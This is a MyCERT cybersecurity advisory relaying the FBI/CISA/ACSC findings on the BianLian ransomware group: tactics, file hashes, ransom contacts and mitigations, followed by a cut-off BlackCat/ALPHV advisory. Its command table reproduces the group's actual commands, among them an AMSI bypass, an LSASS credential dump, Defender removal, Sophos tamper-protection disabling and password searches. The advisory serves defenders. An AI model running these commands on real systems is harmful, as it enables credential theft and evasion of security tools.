Recently, the Federal Bureau of Investigation (FBI), Cybersecurity and Infrastructure Security Agency (CISA), and Australian Cyber Security Centre (ACSC) released a joint Cybersecurity Advisory to disseminate known BianLian ransomware and data extortion group IOCs and TTPs identified through FBI and ACSC investigations as of March 2023. 

BianLian is a ransomware developer, deployer, and data extortion cybercriminal group that has targeted organizations in multiple U.S. critical infrastructure sectors since June 2022. They have also targeted Australian critical infrastructure sectors in addition to professional services and property development. The group gains access to victim systems through valid Remote Desktop Protocol (RDP) credentials, uses open-source tools and command-line scripting for discovery and credential harvesting, and exfiltrates victim data via File Transfer Protocol (FTP), Rclone, or Mega. BianLian group actors then extort money by threatening to release data if payment is not made. BianLian group originally employed a double-extortion model in which they encrypted victims’ systems after exfiltrating the data; however, around January 2023, they shifted to primarily exfiltration-based extortion.

2.0 Technical Details
BianLian is a ransomware developer, deployer, and data extortion cybercriminal group. FBI observed BianLian group targeting organizations in multiple U.S. critical infrastructure sectors since June 2022. In Australia, ACSC has observed BianLian group predominately targeting private enterprises, including one critical infrastructure organization. BianLian group originally employed a doubleextortion model in which they exfiltrated financial, client, business, technical, and personal files for leverage and encrypted victims’ systems. In 2023, FBI observed BianLian shift to primarily exfiltrationbased extortion with victims’ systems left intact, and ACSC observed BianLian shift exclusively to exfiltration-based extortion. BianLian actors warn of financial, business, and legal ramifications if payment is not made.

2.1 Initial access
BianLian group actors gain initial access to networks by leveraging compromised Remote Desktop Protocol (RDP) credentials likely acquired from initial access brokers or via phishing.

2.2 Command and Control
BianLian group actors implant a custom backdoor specific to each victim written in Go (see the Indicators of Compromise Section for an example) and install remote management and access software—e.g., TeamViewer, Atera Agent, SplashTop, AnyDesk—for persistence and command and control.
FBI also observed BianLian group actors create and/or activate local administrator accounts and change those account passwords.

2.3 Defense Evasion
BianLian group actors use PowerShell and Windows Command Shell to disable antivirus tools, specifically Windows defender and Anti-Malware Scan Interface (AMSI). BianLian actors modify the Windows Registry to disable tamper protection for Sophos SAVEnabled, SEDEenabled, and SAVService services, which enables them to uninstall these services. See Appendix: Windows PowerShell and Command Shell Activity for additional information, including specific commands they have used.

2.4 Discovery
BianLian group actors use a combination of compiled tools, which they first download to the victim environment, to learn about the victim’s environment. BianLian group actors have used: 
• Advanced Port Scanner, a network scanner used to find open ports on network computers and retrieve versions of programs running on the detected ports.
• SoftPerfect Network Scanner (netscan.exe), a network scanner that can ping computers, scan ports, and discover shared folders. 
• SharpShares to enumerate accessible network shares in a domain. 
• PingCastle to enumerate Active Directory (AD). PingCastle provides an AD map to visualize the hierarchy of trust relationships. 
BianLian actors also use native Windows tools and Windows Command Shell to: 
• Query currently logged-in users. 
• Query the domain controller to identify:

  • All groups.
  • Accounts in the Domain Admins and Domain Computers groups.
  • All users in the domain. 

• Retrieve a list of all domain controllers and domain trusts. 
• Identify accessible devices on the network. 

2.5 Credential Access
BianLian group uses valid accounts for lateral movement through the network and to pursue other follow-on activity. To obtain the credentials, BianLian group actors use Windows Command Shell to find unsecured credentials on the local machine. FBI also observed BianLian harvest credentials from the Local Security Authority Subsystem Service (LSASS) memory, download RDP Recognizer (a tool that could be used to brute force RDP passwords or check for RDP vulnerabilities) to the victim system, and attempt to access an Active Directory domain database (NTDS.dit).
In one case, FBI observed BianLian actors use a portable executable version of an Impacket tool (secretsdump.py) to move laterally to a domain controller and harvest credential hashes from it. 
Note: Impacket is a Python toolkit for programmatically constructing and manipulating network protocols. Through the Command Shell, an Impacket user with credentials can run commands on a remote device using the Windows management protocols required to support an enterprise network.

2.6 Presistence and Lateral Movement
BianLian group actors use PsExec and RDP with valid accounts for lateral movement. Prior to using RDP, BianLian actors used Command Shell and native Windows tools to add user accounts to the local Remote Desktop Users group, modified the added account’s password, and modified Windows firewall rules to allow incoming RDP traffic. See Appendix: Windows PowerShell and Command Shell Activity for additional information. 
In one case, FBI found a forensic artifact (exp.exe) on a compromised system that likely exploits the Netlogon vulnerability (CVE-2020-1472) and connects to a domain controller.

2.7 Collection
FBI observed BianLian group actors using malware (system.exe) that enumerates registry and files and copies clipboard data from users.

2.8 Exfiltration and Impact
BianLian group actors search for sensitive files using PowerShell scripts (See Appendix: Windows PowerShell and Command Shell Activity) and exfiltrate them for data extortion. Prior to January 2023, BianLian actors encrypted files after exfiltration for double extortion. 
BianLian group uses File Transfer Protocol (FTP) and Rclone, a tool used to sync files to cloud storage, to exfiltrate data. FBI observed BianLian group actors install Rclone and other files in generic and typically unchecked folders such as programdata\vmware and music folders. ACSC observed BianLian group actors use Mega file-sharing service to exfiltrate victim data. 
BianLian’s encryptor (encryptor.exe) modified all encrypted files to have the .bianlian extension. The encryptor created a ransom note, Look at this instruction.txt, in each affected directory (see Figure 1 for an example ransom note.) According to the ransom note, BianLian group specifically looked for, encrypted, and exfiltrated financial, client, business, technical, and personal files.


Figure 1: BianLian Sample Ransom Note (Look at this instruction.txt)

If a victim refuses to pay the ransom demand, BianLian group threatens to publish exfiltrated data to a leak site maintained on the Tor network. The ransom note provides the Tox ID A4B3B0845DA242A64BF17E0DB4278EDF85855739667D3E2AE8B89D5439015F07E81D12D767FC, which does not vary across victims. The Tox ID directs the victim organization to a Tox chat via https://qtox.gitbhub[.]io and includes an alternative contact email address (swikipedia@onionmail[.]org or xxx@mail2tor[.]com). The email address is also the same address listed on the group’s Tor site under the contact information section. Each victim company is assigned a unique identifier included in the ransom note. BianLian group receives payments in unique cryptocurrency wallets for each victim company. 
BianLian group engages in additional techniques to pressure the victim into paying the ransom; for example, printing the ransom note to printers on the compromised network. Employees of victim companies also reported receiving threatening telephone calls from individuals associated with BianLian group.
 

3.0 Indicators of Compromise
See Table 1 for IOCs obtained from FBI investigations as of March 2023.

NameSHA-256 HashDescription
def.exe7b15f570a23a5c5ce8ff942da60834a9d0549ea3ea9f34f900  a09331325df893Malware associated with BianLian intrusions, which is an example of a possible backdoor developed by BianLian group.
encryptor.exe1fd07b8d1728e416f897bef4f1471126f9b18ef108eb952f4b  75050da22e8e43Example of a BianLian encryptor.
exp.exe0c1eb11de3a533689267ba075e49d93d55308525c04d6aff  0d2c54d1f52f5500Possible NetLogon vulnerability (CVE-2020- 1472) exploitation.
system.exe40126ae71b857dd22db39611c25d3d5dd0e60316b72830e  930fba9baf23973ceEnumerates registry and files. Reads clipboard data.

Table 1: BianLian Ransomware and Data Extortion Group IOCs

Through FBI investigation as of March 2023, FBI has observed BianLian actors use the commands in Table 2. ACSC has observed BianLian actors use some of the same commands.

 

CommandUse

[Ref].Assembly.GetType(‘System.Management

.Automation.AmsiUtils’).GetField(‘amsiInitFaile d’,’NonPublic,* Static’).SetValue($null,$true)

Disables the AMSI on Windows. AMSI is a built-in feature on Windows 10 and newer that

provides an interface for anti-malware scanners to inspect scripts prior to execution. When AMSI is disabled, malicious scripts may bypass antivirus solutions and execute undetected.

cmd.exe /Q /c for /f “tokens=1,2 delims= “ ^%A in (‘”tasklist /fi “Imagename eq lsass.exe” | find “lsass””’) do rundll32.exe C:\windows\System32\comsvcs.dll, MiniDump

^%B \Windows\Temp\<file>.csv full

Creates a memory dump lsass.exe process and saves it as a CSV filehttps://attack.mitre.org/versions/v12/techniq ues/T1003/001/. BianLian actors used it to harvest credentials from lsass.exe.

cmd.exe /Q /c net user <admin> /active:yes 1>

\\127.0.0.1\C$\Windows\Temp\<folder> 2>&1

Activates the local Administrator account.
cmd.exe /Q /c net user "<admin>"<password> 1> \\127.0.0.1\C$\Windows\Temp\<folder> 2>&1Changes the password of the newly activated local Administrator account.

cmd.exe /Q /c quser 1>

\\127.0.0.1\C$\Windows\Temp\<folder> 2>&1

Executes quser.exe to query the currently logged-in users on a machine. The command is provided arguments to run quietly and exit upon completion, and the output is directed to the \Windows\Temp directory.

dism.exe /online /Disable-Feature

/FeatureName:Windows-Defender /Remove

/NoRestart

Using the Deployment Image Servicing and Management (DISM) executable file, removes the Windows Defender feature.
dump.exe -no-pass -just-dc user.local/<fileserver.local>\@<local_ip>Executes secretsdump.py, a Portable Executable version of an Impacket tool. Used to dump password hashes from domain controllers.
exp.exe -n <fileserver.local> -t <local_ip>Possibly attempted exploitation of the NetLogon vulnerability (CVE-2020-1472).

findstr /spin "password" *.*

>C:\Users\training\Music\<file>.txt

Searches for the string password in all files in the current directory and its subdirectories and puts the output to a file.
ldap.exe -u user\<user> -p <password> ldap://<local_ip>Connects to the organization’s Lightweight Directory Access Protocol (LDAP) server.
logoffLogs off the current user from a Windows session. Can be used to log off multiple users at once.
mstscLaunches Microsoft Remote Desktop Connection client application in Windows.
net group /domainRetrieves a list of all groups from the domain controller.
net group 'Domain Admins' /domainQueries the domain controller to retrieve a list of all accounts from Domain Admins group.
net group 'Domain Computers' /domainQueries the domain controller to retrieve a list of all accounts from Domain Computers group.
net user /domainQueries the domain controller to retrieve a list of all users in the domain.

net.exe localgroup "Remote Desktop Users"

<user> /add

Adds a user account to the local Remote Desktop Users group.
net.exe user <admin> <password> /domainModifies the password for the specified account.
netsh.exe advfirewall firewall add rule "name=allow RemoteDesktop" dir=in * protocol=TCP localport=<port num> action=allowAdds a new rule to the Windows firewall that allows incoming RDP traffic.
netsh.exe advfirewall firewall set rule "group=remote desktop" new enable=YesEnables the pre-existing Windows firewall rule group named Remote Desktop. This rule group allows incoming RDP traffic.
nltest /dclistRetrieves a list of domain controllers.
nltest /domain_trustsRetrieves a list of domain trusts.
ping.exe -4 -n 1 *

Sends a single ICMP echo request packet to all

devices on the local network using the IPv4 protocol. The output of the command will show if the device is reachable or not.

quser; ([adsisearcher]"(ObjectClass=computer)").Find All().count;([adsisearcher]"(ObjectClass=user)")

.FindAll().count;[Security.Principal.WindowsIde ntity]::GetCurrent() | select name;net user "$env:USERNAME" /domain; (Get-WmiObject - class Win32_OperatingSystem).Caption; Get- WmiObject -Namespace root\cimv2 -Class Win32_ComputerSystem; net group "domain admins" /domain; nltest /dclist:; nltest

/DOMAIN_TRUSTS

Lists the current Windows identity for the logged-in user and displays the user's name. Uses the Active Directory Services Interface (ADSI) to search for all computer and user objects in the domain and returns counts of the quantities found. Lists information about the current user account from the domain, such as the user's name, description, and group memberships. Lists information about the operating system installed on the local computer. Lists information about the "Domain Admins" group from the domain. Lists all domain controllers in the domain. Displays information about domain trusts.

reg.exe add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentC

ontrolSet\Control\Terminal * Server\WinStations\RDP-Tcp" /v UserAuthentication /t REG_DWORD /d 0 /f

Adds/overwrites a new Registry value to disable user authentication for RDP connections.

reg.exe add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentC

ontrolSet\Control\Terminal Server" /* v fAllowToGetHelp /t REG_DWORD /d 1 /f

Adds/overwrites a new Registry value to allow a user to receive help from Remote Assistance.

reg.exe add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentC

ontrolSet\Services\Sophos Endpoint * Defense\TamperProtection\Config" /t REG_DWORD /v SAVEnabled /d 0 /f

Adds/overwrites a new Registry value to disable tamper protection for Sophos antivirus named SAVEnabled.

reg.exe add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentC

ontrolSet\Services\Sophos Endpoint * Defense\TamperProtection\Config" /t REG_DWORD /v SEDEnabled /d 0 /f

Adds/overwrites a new Registry value to disable tamper protection for Sophos antivirus named SEDEnabled.

reg.exe ADD * HKEY_LOCAL_MACHINE\SOFTWARE\WOW

6432Node\Sophos\SAVService\TamperProtecti on /t REG_DWORD /v Enabled /d 0 /f

Adds/overwrites a new registry value to disable tamper protection for a Sophos antivirus service called SAVService.
reg.exe copy hklm\system\CurrentControlSet\services\tvnser ver * hklm\system\CurrentControlSet\control\safeboo t\network\tvnserver /s /fCopies the configuration settings for the tvnserver service to a new location in the registry that will be used when the computer boots into Safe Mode with Networking. This allows the service to run with the same settings in Safe Mode as it does in normal mode.

s.exe /threads:50 /ldap:all /verbose

/outfile:c:\users\<user>\desktop\1.txt

Executes SharpShares.

schtasks.exe /RU SYSTEM /create /sc ONCE

/<user> /tr "cmd.exe /crundll32.exe c:\programdata\netsh.dll,Entry" /ST 04:43

Creates a Scheduled Task run as SYSTEM at 0443 AM. When the task is run, cmd.exe uses crundll32.exe to run the DLL file netsh.dll. (It is likely that netsh.dll is a malware file and not associated with netsh.)
start-process PowerShell.exe -arg C:\Users\Public\Music\<file>.ps1 -WindowStyle HiddenExecutes a PowerShell script, while keeping the PowerShell window hidden from the user.

Table 2: PowerShell and Windows Command Shell Activity

4.0 Recommendations
MyCERT recommend organizations implement the recommendation below to improve your organization’s cybersecurity posture on the basis of the threat actor’s activity.

  • Reduce threat of malicious actors using remote access tools by: 
    • Auditing remote access tools on your network to identify currently used and/or authorized software.
    • Reviewing logs for execution of remote access software to detect abnormal use of programs running as a portable executable.
    • Using security software to detect instances of remote access software only being loaded in memory. 
    • Requiring authorized remote access solutions only be used from within your network over approved remote access solutions, such as virtual private networks (VPNs) or virtual desktop interfaces (VDIs).
    • Blocking both inbound and outbound connections on common remote access software ports and protocols at the network perimeter.
  • Implement application controls to manage and control execution of software.
  • Strictly limit the use of RDP and other remote desktop services.
  • Disable command-line and scripting activities and permissions.
  • Restrict the use of PowerShell.
  • Update Windows PowerShell or PowerShell Core.
  • Enable enhanced PowerShell logging.
  • Configure the Windows Registry to require User Account Control (UAC) approval for any PsExec operations.
  • Review domain controllers, servers, workstations, and active directories.
  • Audit user accounts.
  • Implement time-based access for accounts set at the admin level and higher.

In addition, MyCERT recommend network defenders apply the following mitigations to limit potential adversarial use of common system and network discovery techniques and to reduce the impact and risk of compromise by ransomware or data extortion actors:

  • Implement a recovery plan.
  • Maintain offline backups of data.
  • Require phishing-resistant multifactor authentication.
  • Keep all operating systems, software, and firmware up to date.
  • Segment networks.
  • Identify, detect, and investigate abnormal activity and potential traversal of the indicated ransomware with a networking monitoring tool.
  • Install, regularly update, and enable real time detection for antivirus software.
  • Disable unused ports.
  • Consider adding an email banner to emails.
  • Ensure all backup data is encrypted, immutable.

Generally, MyCERT advises the users of this devices to be updated with the latest security announcements by the vendor and follow best practice security policies to determine which updates should be applied.

For further enquiries, please contact MyCERT through the following channels:

E-mail: cyber999[at]cybersecurity.my 
Phone: 1-300-88-2999 (monitored during business hours) 
Mobile: +60 19 2665850 (24x7 call incident reporting) 
Business Hours: Mon - Fri 09:00 -18:00 MYT 
Web: https://www.mycert.org.my 
Twitter: https://twitter.com/mycert 
Facebook: https://www.facebook.com/mycert.org.my

5.0    References

MA-921.042023: MyCERT Advisory - BlackCat Ransomware

  • 11 Apr 2023
  • Advisory
  • BlackCat, alpha, ALPHV, ransomware

1.0 Introduction
MyCERT has observed an increase in ransomware-related attacks, including those executed by ransomware known as BlackCat/ALPHV. This ransomware variant was identified through FBI investigations. BlackCat/ALPHV ransomware as a service (RaaS) had compromised at least 60 entities worldwide and is the first ransomware group to do so successfully using RUST, considered a more secure programming language with improved performance and reliable concurrent processing. BlackCat-affiliated threat actors typically request ransom payments of several million dollars in Bitcoin and Monero but have accepted ransom payments below the initial ransom demand amount. Many developers and money launderers for BlackCat/ALPHV are linked to Darkside/Blackmatter, indicating they have extensive networks and experience with ransomware operations.

2.0 Impact
The malicious actors’ use of Rust to deliver the ransomware payload sets the stage for its encryption routine. The ransomware binary defaces the system’s background images. It replaces it with one containing a notification that important files have been downloaded and encrypted, plus information on where additional instructions can be found. Sample ransom note is as below:

Figure 1: Sample ransom note of the BlackCat ransomware binary.

  • The payload also terminates specific services related to backups, antivirus applications, databases, Windows internet services, and ESXi virtual machines (VMs).
  • In addition, a new variant of the BlackCat ransomware binary restarts the affected system to safe mode before proceeding to its encryption routine. It also disables system recovery and deletes volume shadow copies to inhibit the recovery of the affected systems.

3.0 Affected Products

  • Windows 7 and higher (7, 8.1, 10,11; 2008r2, 2012, 2016, 2019, 2022).
  • Windows XP and 2003.
  • VMware ESXi
  • Debian and Ubuntu Linux
  • ReadyNAS, Synology, QNAP

4.0 Technical Details

BlackCat/ALPHV ransomware leverages previously compromised user credentials to gain initial access to the victim’s system. Once the malware establishes access, it compromises Active Directory user and administrator accounts. The malware uses Windows Task Scheduler to configure malicious Group Policy Objects (GPOs) to deploy ransomware. Initial malware deployment leverages PowerShell scripts in conjunction with Cobalt Strike and disables security features within the victim’s network. BlackCat/ALPHV ransomware also leverages Windows administrative tools and Microsoft Sysinternals tools during compromise. 

BlackCat/ALPHV steals victim data before the execution of the ransomware, including from cloud providers where company or client data was stored. 

The actors leverage Windows scripting to deploy ransomware and to compromise additional hosts. For example, the following batch and PowerShell scripts were observed: 

  • start.bat - launches the ransomware executable with the required arguments.
  • est.bat  - copies the ransomware to other locations.
  • drag-and-drop-target.bat  - launches the ransomware executable for the MySQL Server.
  • run.bat  - executes a callout command to and external server using SSH – file names may change depending on the company and systems affected.
  • Runsl.psl - PowerShell scripts to disable AV.

5.0 Indicators of Compromise

The following are characteristics of compromise by BlackCat/ALPHV, as mid-February 2022: